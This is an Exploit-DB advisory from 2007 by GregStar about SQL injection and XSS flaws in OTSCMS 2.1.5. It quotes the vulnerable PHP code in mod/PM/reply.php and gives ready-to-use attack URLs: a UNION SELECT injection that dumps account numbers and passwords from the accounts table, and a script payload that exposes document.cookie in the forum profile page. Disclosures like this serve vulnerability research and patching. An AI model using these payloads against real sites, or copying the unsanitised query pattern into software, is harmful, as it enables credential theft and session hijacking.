otscms <= 2.1.5 sql/XSS Multiple Vulnerabilities

2007-02-07T00:00:00
ID EDB-ID:3283
Type exploitdb
Reporter GregStar
Modified 2007-02-07T00:00:00

Description

OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2007-0846,CVE-2007-0847. Webapps exploit for php platform

                                        
                                            ***************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
***************************************************************************************************************
													  		 
* Name = OTSCMS 2.1.5 by Wrzasq (http://otscms.com) ; 											
													  		 
* Class = Sql Injection / XSS  ;											
															 
* Download = http://sourceforge.net/project/showfiles.php?group_id=145557 ;				 			
													  		 
* Found by = GregStar (gregstar[at]c4f.pl) (http://c4f.pl) ;				          		 
												  	  		 
---------------------------------------------------------------------------------------------------------------
[SQL]	
												  		
Vulnerable Code in [path]/mod/PM/reply.php												
															 
line 22-26														
															 
...															 
															 
extract( $http-&gt;extract('id') );

// reads message
$pm = $db-&gt;query('SELECT [pms].`name` AS `name` [...]  ' AND [pms].`id` = ' . $id)-&gt;fetchAll(); &lt;---
$pm = $pm[0];								
															 
...															 
	
Example :

http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;


----
[XSS]


http://[target]/[path]/forum.php?module=User&command=profile&name=&lt;script&gt;alert(document.cookie);&lt;/script&gt;

# milw0rm.com [2007-02-07]